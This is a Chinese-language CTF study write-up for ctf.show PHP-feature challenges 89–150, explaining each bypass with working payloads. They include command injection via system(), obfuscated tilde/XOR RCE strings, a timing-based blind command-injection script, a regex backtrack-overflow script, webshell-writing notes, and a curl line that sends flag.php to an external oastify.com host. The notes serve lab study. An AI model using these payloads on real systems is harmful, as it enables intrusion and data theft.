ctf_show笔记篇(web入门---php特性)

news2024/11/17 11:28:51

目录

 php特性

89:直接数组绕过preg_match当遇到数组时会直接报错输出0

90:这里利用了intval的特性

91:这里需要细节一点

92-93:这两题的方法很多可以发散思维

94:还是利用小数绕过例如4476.0

95:这里在最前面使用%0a或者随便一个其他的添加一个字节隔离开在使用八进制就可以绕过

96:可用php伪协议或者./flag.php绕过

97:简单的数组绕过

98:php三元运算符

99:in_array函数漏洞

100:没有设置什么过滤直接命令执行就好###101题的弱化版

101:ReflectionClass 建立反射类

102:还是写一句话木马进服务器

113:和102同理只是把php改为

114:随便上传两个相同的字符

105:考察变量覆盖

106:这里直接可以用数组绕过,和绕过MD5一样,都是sha加密

107:parse_str函数

​编辑

108:简单绕过

109:这里学到了利用反序列化的__construct魔法函数来利用

110:php的内置函数FilesystemIterator的利用

111:直接利用php的全局变量

112和114:直接利用php伪协议读取

113:is_file函数能处理的长度有限制

115:

123:在php中参数加'.'会被替换掉,除非参数中含有'+'或者'空格'或者'[ ]'这些,这些会被替换为'_',并且保留'.'这一类会被替换掉的符号

125:和123差不多,但是过滤更干净了,利用函数嵌套

126:这里利用到了$a=$_SERVER['argv'];

127:利用php的特性绕过

128:新知识点

129:stripos(1,2)查找2在1中第一次出现的位置

130:直接绕过,0相当于FALLS

131:关于PHP正则的溢出

132:关于php的逻辑运算符

133:利用变量覆盖再利用curl可以传输文件信息

134:$_POST是个幌子

135:这里同样可以用curl来解,利用反斜杠绕过就可以,前提是他没有禁用反斜杠

136:tee命令,可以实现输出又能输入到文件

137:call_user_func()函数调用方法

138:相当于禁用了::

139:命令盲注###这里有个问题,{}这个括号可能跑不出来要自己加

140:让传入的两个函数运行后是0或者false或空

141:利用php计算来绕过return

142:0乘任何数都为0

143:这里和141同理,但是将取反的符号过滤了,所以这里用异或

144:也是同样的只是稍微绕了一下(使用取反,异或,或,都可以)

145:这里其他都还是和143-144一样,只是使用php的if函数的变式来绕过

146:'|','^'同样也可以当作运算符用来绕过return

147:涉及两个知识点create_function的代码注入以及php命令空间

148:异或绕过即可或者非预期

149:条件竞争或者直接在index.php中插入木马

150:这里有多种方法可以解,非预期、日志文件包含、session文件包含、临时文件上传###这里演示一种

 150_plus:这一题利用phpinfo来进行条件竞争创建webshell在服务器上


 php特性

89:直接数组绕过preg_match当遇到数组时会直接报错输出0

90:这里利用了intval的特性

payload:

num=4476%0a

4476%0a不绝对等于4476应为%0a相当于是空格

但是intval(4476%0a,0)这里intval函数用于获取变量的整数值,所以会排除掉%0a所以

intval(4476%0a,0)===4476

intval(a,b)

如果b=0那么会自己去判断a是什么进制,例如a=0x开头则是18进制,0开头则是8进制,也可以直接设置b=10进制之类的

91:这里需要细节一点

/m会多行匹配意思就是

a

php

这样也能匹配到

而这里就只能匹配第一行所以能绕过

92-93:这两题的方法很多可以发散思维

  1. 利用intval可以计算其他进制来绕过,例如使用八进制   payload:010574
  2. 或者利用intval取整的特性4476.1####92题不行
  3. 92题可以使用16进制绕过

94:还是利用小数绕过例如4476.0

这里不知道为什么4476.0可以但是4476.1或者4476.2其他的数字不行

95:这里在最前面使用%0a或者随便一个其他的添加一个字节隔离开在使用八进制就可以绕过

payload:

%0a010574

96:可用php伪协议或者./flag.php绕过

97:简单的数组绕过

原理:当md5函数加密数组时会报错NULL,当两a和b同时都是数组时,md5(a)===md5(b)等于NULL===NULL

解法2:利用明文不同但是hashi值相同的两个字符串

98:php三元运算符

三元运算符就是php的if函数的变式:

例如:$a = $b == 3?4:5;   等同于if($b == 3){$a = 4}else{$a == 5}

$_GET?$_GET=&$_POST:'flag';

等于if($_GET){$_GET=&$_POST}else{'flag'}

解析:当通过get方式传入参数时就把get传入参数改为post传入参数

$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';

因为已经表名了当通get传参直接变成POST传参所以这里应该变为

if($_POST['flag']=='flag'){$_POST=&$_COOKIE}else{'flag'}

解析:只要有通过post传输参数flag=flag,那么POST传入参数改为COOKIE传入参数

$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';

还是同理,因为了通过post传输参数flag=flag直接变成COOKIE传参所以这里应该变为

if($_COOKIE['flag']=='flag'){$_COOKIE=&_SERVER}else{'flag'}

解析:只要有通过COOKIE传输参数flag=flag,那么COOKIE传入参数改为SERVER传入参数

highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);

最后这里

highlight_file(if($_SERVER['HTTP_FLAG']=='flag'){$flag}else{__FILE__})

所以最后payload:

  1. ?a=1               ####随便传入一个get引用第一个方法将$_GET传参改为$_POST
  2. post传参:flag=flag       ####将$_POST传参改为$_COOKIE
  3. Cookie: flag=flag         ####将$_COOKIE传参改为$_SERVER
  4. Flag: flag          ####获取到flag

99:in_array函数漏洞

当type参数没有设置的话他不会检查数据和数组的类型是否相同

例如:

in_array(1.abc,1),一个是字符串一个是数组,但是没有设置第三个参数,就可以形成自动转换,1.abc自动转换为1

100:没有设置什么过滤直接命令执行就好###101题的弱化版

payload1:

?v1=21&v2=var_dump($ctfshow)/*&v3=*/;

payload2:

?v1=1&v2=system('ls')/*&v3=*/;

payload3:

?v1=1&v2=cp ctfshow.php 1.txt/*&v3=*/;    ####访问1.txt就可以访问

101:ReflectionClass 建立反射类

从提示可知少给了一位flag,拿到bp爆破就好

102:还是写一句话木马进服务器

substr(a,b)函数是一个截取函数,a是需要被截取的字符串,b是需要从第几位开始截取###从零开始数

call_user_func函数类似于一种特别的调用函数的方法

file_put_contents函数是一个写入字符串进文件的函数,也可以通过此函数创建文件并写入东西

构造payload:

113:和102同理只是把php改为<?=就好,这个等同于<?php echo

114:随便上传两个相同的字符

105:考察变量覆盖

foreach函数:通过get传入?a=b那么通过foreach函数使$key=a而$value=b

$$key=$$value,这里的意思就是把原本的值当作变量名用了

这里的就相当于是$$key=$$value    <>    $a=$b

106:这里直接可以用数组绕过,和绕过MD5一样,都是sha加密

107:parse_str函数

这里会通过parse_str把$v1的值给$v2有点像赋值

给v1传入flag=1,赋值以后,$v2=([flag] => 1)

108:简单绕过

ereg(a,b)类似于搜索,a是条件类似于正则,b使字符串如果b中有a的要求的东西则输出真

ereg函数存在NULL截断漏洞,导致了正则过滤被绕过

strrev()是取反函数传入abc返回cba这种

109:这里学到了利用反序列化的__construct魔法函数来利用

__cddonstruct魔法函数当使用new实例化一个对象的时候就会引用

payload:

v1=

class{

    public function __construct(){

        system('ls')

    }

}

v2=1

连起来就是echo new (class{public function __construct(){system('ls')}}1())

110:php的内置函数FilesystemIterator的利用

FilesystemIterator()可以读取指定的目录文件

fetcwd()可以获取当前目录的路径

111:直接利用php的全局变量

112和114:直接利用php伪协议读取

113:is_file函数能处理的长度有限制

解答1:

/proc/self/root表示根目录

利用这个多次添加让is_file函数认为这不是个文件

解答2:

php中的zip伪协议

官方用法compress.zlib://file.gz         compress.zlib://file.bz2

115:

trim()函数用于移除字符串两侧的空格

这里利用%0c绕过相当于是<,并且并不会被trim过滤掉,并且输入的参数还是int型

123:在php中参数加'.'会被替换掉,除非参数中含有'+'或者'空格'或者'[ ]'这些,这些会被替换为'_',并且保留'.'这一类会被替换掉的符号

125:和123差不多,但是过滤更干净了,利用函数嵌套

126:这里利用到了$a=$_SERVER['argv'];

$_SERVER['argv']:

传递给该脚本的参数的数组。脚本以命令行方式运行时,argv变量传递给程序C语言样式的命令行参数。当通过GET方式调用时,该变量包含query string。

大致来说就是会把接收的数据变成数组,数据用分隔号隔开例如+之类的

payload:

get:$a=a+fl0g=flag_give_me

post=CTF_SHOW=2&CTF[SHOW.COM=1&fun=parse_str($a[1])

这里通过$_SERVER['argv']给$a指定了他的方式

第一个参数$_SERVER['argv'][0]是脚本名,其余的是传递给脚本的参数(例如这样的$a[1])

parse_str函数:

127:利用php的特性绕过

$_SERVER['QUERY_STRING']获取 URL 数据并使用 PHP 中的 Explode 函数将数据转换为数组

128:新知识点

_()==gettext() 是gettext()的拓展函数,开启text扩展。需要php扩展目录下有php_gettext.dll

get_defined_vars — 返回由所有已定义变量所组成的数组 这样可以获得 $flag

129:stripos(1,2)查找2在1中第一次出现的位置

利用目录穿越例如/ctfshow/../../../etc/passwd

130:直接绕过,0相当于FALLS

131:关于PHP正则的溢出

当存在这样的情况时可能会出现正则溢出的情况

例如:

原字符:abcd                正则:.*?d

这里的.*?会率先匹配第一个字符a但是他选择先不匹配,因为是非贪婪模式(在可以匹配和不匹配之间优先选择不匹配),这里会把选择权给d,d回去匹配下一个字符b,如果不匹配选择权又会回到.*?去匹配b,但是还是因为非贪婪模式,不回去直接匹配,又把选择权给d,直到匹配到最后一个字符d才会停下

import requests

url = r'http://a3835817-be92-4fb2-ba94-2db402037f5a.challenge.ctf.show/'

data = {
    'f': 'aaaaaaaa'*130000+'36Dctfshow'
}

a = requests.post(url=url, data=data)
print(a.text)

132:关于php的逻辑运算符

对于“与”(&&) 运算: x && y 当xfalse时,直接跳过,不执行y
对于“或”(||) 运算 :   x||y 当xtrue时,直接跳过,不执行y

133:利用变量覆盖再利用curl可以传输文件信息

payload:`$F`;+curl -X POST -F a=flag.php https://lj8u9k8tr39ry1cpwrqhz7ndd4jx7nvc.oastify.com

134:$_POST是个幌子

$_SERVER['QUERY_STRING']:

这里会获取url里?后面的数据

parse_str():

将这样的a=1&b=2给附上值,变成$a=1  $b=2

extract():

把数组的键值和键名当作变量名和变量值,例如a[b]=c那么extract(a[b])    <==>    b=c

135:这里同样可以用curl来解,利用反斜杠绕过就可以,前提是他没有禁用反斜杠

136:tee命令,可以实现输出又能输入到文件

例如:cat flag.php|tee 1       看flag.php文件又能输出到文件1里

137:call_user_func()函数调用方法

调用类里的方法时

array("a","b")   <==>   a::b

138:相当于禁用了::

但是call_user_func(array("a","b"))使用array创建数组调用类里面的方法

所以传输的时候可以使用变式,直接传数组

例如:a[0]=a     a[1]=b       这样和使用array来创建数组是相同的

139:命令盲注###这里有个问题,{}这个括号可能跑不出来要自己加

ls / -1  自动换行     awk  "NR==1"  取第一排      cut -c 1  取第一个

if [ a == b ];then echo 123;fi     if的[]里必须有间隔不然会报错,如果a等于b执行then echo 123,错误则执行fi

import requests

url = r"http://16c540da-b9a6-4523-bccd-019f974cb794.challenge.ctf.show/?c="
flag1 = "qwertyuiopasdfghjklzxcvbnm_-=+[]{};\':\",./<>?123456789."
flag = ""

for i in range(1, 6):
    for a in range(1, 32):
        for b in flag1:
            payload = f"if [ `ls / -1|awk \"NR=={i}\"|cut -c {a}` == \"{b}\" ];then sleep 4;fi"
            try:
                requests.get(url=url+payload, timeout=3)
            except:
                flag += b
                print(flag)
                break

140:让传入的两个函数运行后是0或者false或空

141:利用php计算来绕过return

 ####这里141和143-144可以去看我的这篇博文

无字母数字rce总结(自增、取反、异或、或、临时文件上传)-CSDN博客

/^\W+$/ 作用是匹配非数字字母下划线的字符

可使用取反来绕过

<?php

echo urlencode(~'system');
echo '  ';
echo urlencode(~'\'ls\''

1-phpinfo()-1  =  2       return在输出计算结果的同时,也会把phpinfo()的结果输出

payload:v1=1&v2=1&v3=-(~%8C%86%8C%8B%9A%92)(~%D8%93%8C%D8)-

142:0乘任何数都为0

143:这里和141同理,但是将取反的符号过滤了,所以这里用异或

 ####这里141和143-144可以去看我的这篇博文

无字母数字rce总结(自增、取反、异或、或、临时文件上传)-CSDN博客

144:也是同样的只是稍微绕了一下(使用取反,异或,或,都可以)

只是把v2和v3换了个位置,给v2赋值‘-’

 ####这里141和143-144可以去看我的这篇博文

无字母数字rce总结(自增、取反、异或、或、临时文件上传)-CSDN博客

145:这里其他都还是和143-144一样,只是使用php的if函数的变式来绕过

1?a:b

等同于

if 1{

a;

}else{

b;

}

payload:

(~%8c%86%8c%8b%9a%92)(~%9c%9e%8b%df%99%d5)

system  cat f*

146:'|','^'同样也可以当作运算符用来绕过return

147:涉及两个知识点create_function的代码注入以及php命令空间

create_function的代码注入###本函数已自 PHP 7.2.0 起被废弃,并自 PHP 8.0.0 起被移除

此函数在内部执行  eval(),因此具有跟  eval() 相同的安全问题,就是因为他创建匿名函数的同时会内部执行eval,就会直接将里面的参数全部执行了

​​​例如:
create_function(a,b)
等同于
function xxx(a){
b
}
php命令空间
在PHP中普通的调用函数方式相当于是调用的相对路径,例如调用create_function,其实是调用的\create_function此路径的函数,在php中可以自定义命名空间,但是最基本的命名空间就是调用\下面的函数

148:异或绕过即可或者预期解

149:条件竞争或者直接在index.php中插入木马

150:这里有多种方法可以解,非预期、日志文件包含、session文件包含、临时文件上传###这里演示一种

日志文件包含:

这里需要vip这个变量等于1  isvip函数才会返回true才能最后利用到这里的include函数

if($isVIP && strrpos($ctf, ":")===FALSE){
    include($ctf);
}
而要让isVIP这个变量赋值为1,需要利用到extract函数####这里134题也讲过

extract():

把数组的键值和键名当作变量名和变量值,例如a[b]=c那么extract(a[b])    <==>    b=c

 150_plus:这一题利用phpinfo来进行条件竞争创建webshell在服务器上

class_exists检查类是否被定义

__autoload — 尝试加载未定义的类会被调用

利用extract(..CTFSHOW..);来覆盖$__CTFSHOW__

####关于符号  ' . '  这个在之前做过解释,在php里,变量如果使用特殊字符如'['和'.'还有空格这一类的,会自动被加载为_

这里似乎被删减过,只要找到phpinfo就能获得flag

最后payload:?..CTFSHOW..=phpinfo

但是这里还是要对这个条件竞争做一个笔记

这里是vuhub上做出的解释

##不理解为什么会出现临时文件可以去看这篇无字母数字rce总结(自增、取反、异或、或、临时文件上传)-CSDN博客

大致来讲就是,通过post传入参数时同时上传的文件会被服务器存为临时文件,但在每次执行完命令之后就会立马删除,必须要在它没删除之前访问它才能让他保留,但这种情况几乎不存在,所以需要卡bug,通过phpinfo页面来增加他执行完成的时间,上面有原理。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1485530.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

spring boot 修复 Spring Framework URL解析不当漏洞(CVE-2024-22243)

漏洞描述 当应用程序使用UriComponentsBuilder来解析外部提供的URL&#xff08;如通过查询参数&#xff09;并对解析的URL的主机执行验证检查时可能容易受到Open重定向攻击和SSRF攻击&#xff0c;导致网络钓鱼和内部网络探测等。 受影响产品或系统 6.1.0 < Spring Framew…

【bioinformation 2】生物数据库

&#x1f31e;欢迎来到AI医学的世界 &#x1f308;博客主页&#xff1a;卿云阁 &#x1f48c;欢迎关注&#x1f389;点赞&#x1f44d;收藏⭐️留言&#x1f4dd; &#x1f31f;本文由卿云阁原创&#xff01; &#x1f4c6;首发时间&#xff1a;&#x1f339;2024年3月3日&…

【新书推荐】11.1 子程序设计

第十一章 子程序及参数传递 本章先讲述子程序设计的方法&#xff0c;然后介绍在子程序调用中参数的四种传递方法。 11.1 子程序设计 在前面的示例和练习中&#xff0c;会发现程序中会有一些反复使用到的代码片段。我们将程序中反复出现的程序片段设计成子程序&#xff0c;这样…

DM数据库学习之路(十九)DM8数据库sysbench部署及压力测试

sysbench部署 安装依赖 yum -y install make automake libtool pkgconfig libaio-devel vim-common 上传sysbench源代码 sysbench_tool.tar 测试是否安装成功 $ /opt/sysbench/sysbench-master-dpi/src/lua $ ./sysbench --version sysbench 1.1.0 sysbench测试DM 测试…

【STK】手把手教你利用STK进行仿真-STK软件基础02 STK系统的软件界面01 STK的界面窗口组成

STK系统是Windows窗口类型的桌面应用软件,功能非常强大。在一个桌面应用软件中集成了仿真对象管理、仿真对象属性参数、设置、空间场景二三维可视化、场景显示控制欲操作、仿真结果报表定制与分析、对象数据管理、仿真过程控制、外部接口连接和系统集成编程等复杂的功能。 STK…

MyBatis源码分析之基础支持层解析器

(/≧▽≦)/~┴┴ 嗨~我叫小奥 ✨✨✨ &#x1f440;&#x1f440;&#x1f440; 个人博客&#xff1a;小奥的博客 &#x1f44d;&#x1f44d;&#x1f44d;&#xff1a;个人CSDN ⭐️⭐️⭐️&#xff1a;传送门 &#x1f379; 本人24应届生一枚&#xff0c;技术和水平有限&am…

录制用户操作实现自动化任务

先上视频&#xff01;&#xff01; 流程自动化工具-录制操作绘制流程 这个想法之前就有了&#xff0c;趁着周末时间给它撸出来。 实现思路 从之前的文章自动化桌面未来展望中已经验证了录制绘制流程图的可行性。基于DOM录制页面操作轨迹的思路监听页面点击、输入事件即可&…

蓝桥杯练习题——二分

1.借教室 思路 1.随着订单的增加&#xff0c;每天可用的教室越来越少&#xff0c;二分查找最后一个教室没有出现负数的订单编号 2.每个订单的操作是 [s, t] 全部减去 d #include<iostream> #include<cstring> using namespace std; const int N 1e6 10; int d[…

Linux之相对路径、绝对路径、特殊路径符

相对路径和绝对路径 cd /root/temp 绝对路径写法 cd temp 相对路径写法 1、绝对路径&#xff1a;以根目录为起点&#xff0c;描述路径的一种写法&#xff0c;路径描述以 / 开头。 2、相对路径&#xff1a;以当前目录为起点&#xff0c;路径描述无需以 / 开头。 特殊路径符 如…

cRIO9040中NI9871模块的测试

硬件准备 CompactRIO9040NI9871直流电源&#xff08;可调&#xff09;网线RJ50转DB9线鸣志STF03-R驱动器和步进电机 软件安装 参考&#xff1a;cRIO9040中NI9381模块的测试 此外&#xff0c;需安装NI-Serial 9870和9871扫描引擎支持 打开NI Measurement&#xff06;Automa…

C++之set、multiset

1、set简介 set是一种关联式容器&#xff0c;包含的key值唯一&#xff0c;所有元素都会在插入时自动被排序&#xff0c;其存储结构为红黑树。set只能通过迭代器(iterator)访问。 set和multiset的区别&#xff1a; &#xff08;1&#xff09;set不允许容器中有重复的元素&…

C++_程序流程结构_选择结构_if

程序流程结构 C/C支持最基本的三种程序运行结构&#xff1a;顺序、选择、循环结构 顺序结构&#xff1a;程序按顺序执行&#xff0c;不发生跳转选择结构&#xff1a;依据条件是否满足&#xff0c;有选择地执行相应功能循环结构&#xff1a;依据条件是否满足&#xff0c;循环多…

跟 AI 学 StarRocks:简介

因为要支持公司的 BI 建设&#xff0c;团队引入了 StarRocks 数据库&#xff0c;此前我没有了解过此项技术&#xff0c;不过因为有架构师引入了此项技术栈&#xff0c;就顺便学习一下。 一、什么是 MPP 数据库&#xff1f; MPP 数据库指的是大规模并行处理&#xff08;Massiv…

zotero | 多平台同步 | 坚果云

zotero注册登陆 打开zotero软件&#xff0c;mac电脑打开首选项&#xff0c;如下图所示&#xff1a; 然后点击同步选项&#xff0c;如下图所示&#xff0c;如果已经有账号&#xff0c;请登陆账号&#xff0c;无则注册账号之后再登陆&#xff1b; 注册坚果云账号 注册完坚果…

QT6 libModbus 用于ModbusTcp客户端读写服务端

虽然在以前的文章中多次描述过,那么本文使用开源库libModbus,可得到更好的性能&#xff0c;也可移植到各种平台。 性能&#xff1a;读1次和写1次约各用时2ms。 分别创建了读和写各1个连接指针&#xff0c;用于读100个寄存器和写100个寄存器&#xff0c;读写分离。 客户端&am…

文心一言 VS 讯飞星火 VS chatgpt (206)-- 算法导论15.4 3题

三、设计 LCS-LENGTH的带备忘的版本&#xff0c;运行时间为O(mn)。需要写代码的时候&#xff0c;请用go语言。 文心一言&#xff0c;代码正常运行&#xff1a; LCS-LENGTH&#xff08;Longest Common Subsequence Length&#xff09;问题的带备忘的版本通常指的是使用动态规划…

备考2024年小学生古诗文大会:历年真题15题练习和独家解析

如何提高小学生古诗词的知识&#xff1f;如何激发小学生古诗词的学习兴趣&#xff1f;如何提高小学古诗词的学习成绩&#xff1f;如何备考2024年小学生古诗文大会&#xff1f;... 如果你也在关注这些问题&#xff0c;我的建议是参加每年一度的小学生古诗词大会&#xff08;免费…

金融行业专题|期货超融合架构转型与场景探索合集(2023版)

更新内容&#xff1a; 更新 SmartX 超融合在期货行业的覆盖范围、部署规模与应用场景。新增 CTP 主席系统实践与评测、容器云资源池等场景实践。更多超融合金融核心生产业务场景实践&#xff0c;欢迎下载阅读电子书《SmartX 金融核心生产业务场景探索文章合集》。 面对不断变…

云计算与大数据课程笔记(一)云计算背景与介绍

如何实现一个简易搜索引擎&#xff1f; 实现一个简易的搜索引擎可以分为几个基本步骤&#xff1a;数据收集&#xff08;爬虫&#xff09;、数据处理&#xff08;索引&#xff09;、查询处理和结果呈现。下面是一个概括的实现流程&#xff1a; 1. 数据收集&#xff08;爬虫&am…

Android和Linux的嵌入式开发差异

最近开始投入Android的怀抱。说来惭愧&#xff0c;08年就听说这东西&#xff0c;当时也有同事投入去看&#xff0c;因为恶心Java&#xff0c;始终对这玩意无感&#xff0c;没想到现在不会这个嵌入式都快要没法搞了。为了不中年失业&#xff0c;所以只能回过头又来学。 首先还是…